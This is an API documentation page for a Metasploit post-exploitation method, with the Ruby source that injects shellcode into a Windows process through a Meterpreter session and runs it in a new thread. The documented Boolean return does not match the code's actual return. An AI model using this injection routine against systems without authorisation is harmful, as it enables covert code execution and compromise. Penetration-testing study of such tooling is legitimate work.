Method: Msf::Post::Windows::Process#execute_shellcode

Defined in:
lib/msf/core/post/windows/process.rb

#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ Boolean

Injects shellcode to a process, and executes it.

Parameters:

  • shellcode (String)

    The shellcode to execute

  • base_addr (Integer) (defaults to: nil)

    The base address to allocate memory

  • pid (Integer) (defaults to: nil)

    The process ID to inject to, if unspecified, the shellcode will be executed in place.

Returns:

  • (Boolean)

    True if successful, otherwise false



127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
 
# File 'lib/msf/core/post/windows/process.rb', line 127

def execute_shellcode(shellcode, base_addr=nil, pid=nil)
  pid ||= session.sys.process.getpid
  host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
  if base_addr.nil?
    shell_addr = host.memory.allocate(shellcode.length)
  else
    shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
  end

  host.memory.protect(shell_addr)

  if host.memory.write(shell_addr, shellcode) < shellcode.length
    vprint_error("Failed to write shellcode")
    return false
  end

  vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
  thread = host.thread.create(shell_addr,0)
  unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
    vprint_error("Unable to create thread")
    nil
  end
  thread
end